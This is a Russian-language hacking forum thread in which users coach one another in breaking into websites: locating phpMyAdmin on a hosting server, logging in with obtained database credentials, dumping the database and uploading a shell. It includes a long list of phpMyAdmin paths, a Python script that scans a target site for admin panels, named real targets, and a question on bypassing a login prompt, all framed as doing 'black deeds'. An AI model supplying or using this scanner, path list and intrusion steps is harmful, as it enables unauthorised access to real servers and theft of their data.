Так вот найди его, и потом зайди с логином и паролем, которые ты получил. а потом - читай заливка шелла через пхпмайдмин.
Ну значит ищиш пхпмайадмин на хосте и логинишся с данными БД... Там будет ф-я дамп БД... Бэкап можно сделать с помощю утилы mysqldump Для этого необходимо воспользоваться утилитой mysqldump, которая доступна через unix shell”. Для того, выполни команду: > mysqldump -uимя_пользователя -p -hимя_сервера_БД имя_базы > dump.sql
ette гдета выкладовал пути, только н помню где...вот кароче сохранил тогда: Code: /phpm/ /phpmy/ /phpmyadmin/ /PMA/ /mysql/ /admin/ /db/ /dbadmin/ /web/phpMyAdmin/ /admin/pma/ /admin/phpmyadmin/ /admin/mysql/ /phpmyadmin2/ /mysqladmin/ /mysql-admin/ /phpMyAdmin-2.5.6/ /phpMyAdmin-2.5.4/ /phpMyAdmin-2.5.1/ /phpMyAdmin-2.2.3/ /phpMyAdmin-2.2.6/ /myadmin/ /phpMyA/ /phpmyad/ /phpMyAdmin-2.6.0/ /phpMyAdmin-2.6.0-pl1/ /phpMyAdmin-2.6.3-pl1/ /phpMyAdmin-2.6.3/ /phpMyAdmin-2.6.3-rc1/ /phpMyAdmin-2.6.2-rc1/ /phpMyAdmi/ /phpMyAdmin1/ /phpMyAdmin2/ /phpMyAdmin-2/ /phpMyAdmin-2.10.0/ /phpMyAdmin-2.3.0/ /phpMyAdmin-2.3.1/ /phpMyAdmin-2.3.2/ /phpMyAdmin-2.3.3/ /phpMyAdmin-2.3.4/ /phpMyAdmin-2.3.5/ /phpMyAdmin-2.3.6/ /phpMyAdmin-2.3.7/ /phpMyAdmin-2.3.8/ /phpMyAdmin-2.3.9/ /phpMyAdmin-2.4.0/ /phpMyAdmin-2.4.1/ /phpMyAdmin-2.4.2/ /phpMyAdmin-2.4.3/ /phpMyAdmin-2.4.4/ /phpMyAdmin-2.4.5/ /phpMyAdmin-2.4.6/ /phpMyAdmin-2.4.7/ /phpMyAdmin-2.4.8/ /phpMyAdmin-2.4.9/ /phpMyAdmin-2.5.0/ /phpMyAdmin-2.5.1/ /phpMyAdmin-2.5.2/ /phpMyAdmin-2.5.3/ /phpMyAdmin-2.5.4/ /phpMyAdmin-2.5.5/ /phpMyAdmin-2.5.6/ /phpMyAdmin-2.5.7/ /phpMyAdmin-2.5.8/ /phpMyAdmin-2.5.9/ /phpMyAdmin-2.6.0/ /phpMyAdmin-2.6.1/ /phpMyAdmin-2.6.2/ /phpMyAdmin-2.6.3/ /phpMyAdmin-2.6.4/ /phpMyAdmin-2.6.5/ /phpMyAdmin-2.6.6/ /phpMyAdmin-2.6.7/ /phpMyAdmin-2.6.8/ /phpMyAdmin-2.6.9/ /phpMyAdmin-2.7.0/ /phpMyAdmin-2.7.1/ /phpMyAdmin-2.7.2/ /phpMyAdmin-2.7.3/ /phpMyAdmin-2.7.4/ /phpMyAdmin-2.7.5/ /phpMyAdmin-2.7.6/ /phpMyAdmin-2.7.7/ /phpMyAdmin-2.7.8/ /phpMyAdmin-2.7.9/ /phpMyAdmin-2.8.1/ /phpMyAdmin-2.8.2/ /phpMyAdmin-2.8.3/ /phpMyAdmin-2.8.4/ /phpMyAdmin-2.8.5/ /phpMyAdmin-2.8.6/ /phpMyAdmin-2.8.7/ /phpMyAdmin-2.8.8/ /phpMyAdmin-2.8.9/ /phpMyAdmin-2.9.1/ /phpMyAdmin-2.9.2/ /phpMyAdmin-3/ /phpMyAdmin-4/ /phpMyAds/ /phpmyad-sys/
то есть нужно набирать timeweb.ru/phpMyAdmin-2.4.1/ так? помогите мужики, подарю сайт с паролиями только другой timeweb.ru - это хостинг
так, правда ни одна из этих дир может не подойти... Но попытка не пытка... В ручную перебирать - это маразм! Вот те скрипт: Code: #/usr/bin/python import sys, os, time, httplib if sys.platform == 'linux' or sys.platform == 'linux2': clearing = 'clear' else: clearing = 'cls' os.system(clearing) if len(sys.argv) != 2: print "\n|-------------------------------------------------------------|" print "| Admin login finder v2.0 |" print "| Help: admin-find.py -h |" print "|---------------------------------------------------------------|\n" sys.exit(1) for arg in sys.argv: if arg == '-h': print "\n|-----------------------------------------------------------------------------|" print "| Admin login finder v2.0 |" print "| Usage: admin-find.py www.site.com |" print "| Example: admin-find.py site.com |" print "|-------------------------------------------------------------------------------|\n" sys.exit(1) site = sys.argv[1].replace("http://","").rsplit("/",1)[0] site = site.lower() admin_path = ['admin.php','admin/','administrator/','moderator/','webadmin/','adminarea/','bb-admin/','adminLogin/','admin_area/','panel-administracion/','instadmin/','memberadmin/','administratorlogin/','adm/','admin/account.php','admin/index.php','admin/login.php','admin/admin.php','admin/account.php','joomla/administrator','login.php', 'admin_area/admin.php','admin_area/login.php','siteadmin/login.php','siteadmin/index.php','siteadmin/login.html','admin/account.html','admin/index.html','admin/login.html','admin/admin.html','admin_area/index.php','bb-admin/index.php','bb-admin/login.php','bb-admin/admin.php','admin/home.php','admin_area/login.html','admin_area/index.html','admin/controlpanel.php','admincp/index.asp','admincp/login.asp','admincp/index.html','admin/account.html','adminpanel.html','webadmin.html','w ebadmin/index.html','webadmin/admin.html','webadmin/login.html','admin/admin_login.html','admin_login.html','panel-administracion/login.html','admin/cp.php','cp.php','administrator/index.php','administrator/login.php','nsw/admin/login.php','webadmin/login.php','admin/admin_login.php','admin_login.php','administrator/account.php','administrator.php','admin_area/admin.html','pages/admin/admin-login.php','admin/admin-login.php','admin-login.php','bb-admin/index.html','bb-admin/login.html','bb-admin/admin.html','admin/home.html','modelsearch/login.php','moderator.php','moderator/login.php','moderator/admin.php','account.php','pages/admin/admin-login.html','admin/admin-login.html','admin-login.html','controlpanel.php','admincontrol.php', 'admin/adminLogin.html','adminLogin.html','admin/adminLogin.html','home.html','rcjakar/admin/login.php','adminarea/index.html','adminarea/admin.html','webadmin.php','webadmin/index.php','webadmin/admin.php','admin/controlpanel.html','admin.html','admin/cp.html','cp.html','adminpanel.php','moderator.htm l','administrator/index.html','administrator/login.html','user.html','administrator/account.html','administrator.html','login.html','m odelsearch/login.html','moderator/login.html','adminarea/login.html','panel-administracion/index.html','panel-administracion/admin.html','modelsearch/index.html','modelsearch/admin.html','admincontrol/login.html','adm/index.html','adm.html','moderator/admin.html','user.php','account.html','controlpane l.html','admincontrol.html','panel-administracion/login.php','wp-login.php','adminLogin.php','admin/adminLogin.php','home.php','adminarea/index.php','adminarea/admin.php','adminarea/login.php','panel-administracion/index.php','panel-administracion/admin.php','modelsearch/index.php','modelsearch/admin.php','admincontrol/login.php','adm/admloginuser.php','admloginuser.php','admin2.php', 'admin2/login.php','admin2/index.php','adm/index.php','adm.php','affiliate.php','adm_auth.php ','memberadmin.php','administratorlogin.php'] print "\n|-------------------------------------------------------------|" print "| Admin login finder v2.0 |" print "|---------------------------------------------------------------|\n" print "\n[-] %s" % time.strftime("%X") print "[+] Target:",site print "[+] Checking paths..." print try: for admin in admin_path: admin = admin.replace("\n","") admin = "/" + admin connection = httplib.HTTPConnection(site) connection.request("GET",admin) response = connection.getresponse() print "%s %s %s" % (admin, response.status, response.reason) except(KeyboardInterrupt,SystemExit): raise except: pass Это брутер админок, замени адреса админок на адреса расположения пхпмайадмин: Code: admin_path = ['admin.php','admin/','administrator/','moderator/','webadmin/','adminarea/','bb-admin/','adminLogin/','admin_area/','panel-administracion/','instadmin/','memberadmin/','administratorlogin/','adm/','admin/account.php','admin/index.php','admin/login.php','admin/admin.php','admin/account.php','joomla/administrator','login.php', 'admin_area/admin.php','admin_area/login.php','siteadmin/login.php','siteadmin/index.php','siteadmin/login.html','admin/account.html','admin/index.html','admin/login.html','admin/admin.html','admin_area/index.php','bb-admin/index.php','bb-admin/login.php','bb-admin/admin.php','admin/home.php','admin_area/login.html','admin_area/index.html','admin/controlpanel.php','admincp/index.asp','admincp/login.asp','admincp/index.html','admin/account.html','adminpanel.html','webadmin.html','w ebadmin/index.html','webadmin/admin.html','webadmin/login.html','admin/admin_login.html','admin_login.html','panel-administracion/login.html','admin/cp.php','cp.php','administrator/index.php','administrator/login.php','nsw/admin/login.php','webadmin/login.php','admin/admin_login.php','admin_login.php','administrator/account.php','administrator.php','admin_area/admin.html','pages/admin/admin-login.php','admin/admin-login.php','admin-login.php','bb-admin/index.html','bb-admin/login.html','bb-admin/admin.html','admin/home.html','modelsearch/login.php','moderator.php','moderator/login.php','moderator/admin.php','account.php','pages/admin/admin-login.html','admin/admin-login.html','admin-login.html','controlpanel.php','admincontrol.php', 'admin/adminLogin.html','adminLogin.html','admin/adminLogin.html','home.html','rcjakar/admin/login.php','adminarea/index.html','adminarea/admin.html','webadmin.php','webadmin/index.php','webadmin/admin.php','admin/controlpanel.html','admin.html','admin/cp.html','cp.html','adminpanel.php','moderator.htm l','administrator/index.html','administrator/login.html','user.html','administrator/account.html','administrator.html','login.html','m odelsearch/login.html','moderator/login.html','adminarea/login.html','panel-administracion/index.html','panel-administracion/admin.html','modelsearch/index.html','modelsearch/admin.html','admincontrol/login.html','adm/index.html','adm.html','moderator/admin.html','user.php','account.html','controlpane l.html','admincontrol.html','panel-administracion/login.php','wp-login.php','adminLogin.php','admin/adminLogin.php','home.php','adminarea/index.php','adminarea/admin.php','adminarea/login.php','panel-administracion/index.php','panel-administracion/admin.php','modelsearch/index.php','modelsearch/admin.php','admincontrol/login.php','adm/admloginuser.php','admloginuser.php','admin2.php', 'admin2/login.php','admin2/index.php','adm/index.php','adm.php','affiliate.php','adm_auth.php ','memberadmin.php','administratorlogin.php'] и брути)
2 joomler Качай интерпритатор питома (http://www.python.org/ftp/python/2.5/python-2.5.msi) И запускай с командной строки: путь до питона путь до сплойта например: C:\Python\python.exe C:\exploit.py
joomler, ап! Радуйся))) Я нашол пхпмай админ=) Линк: http://phoenix.timeweb.ru/phpMyAdmin/ Логинишся там и делаешь свои чёрные делишки
чуваки, кароче есть сайт по адресу http://novy.tv/phpmyadmin , но только там стоит Basic авторизация . как её обойти ?
Эм...мне кажется, что это не бейсик авторизация! При закрытии окошка авторизации выводится "Отказано в доступе" а если закрыть его при бейсик авторизации должна быть апачевская ошибка. Скорее всего это авторизация через БД.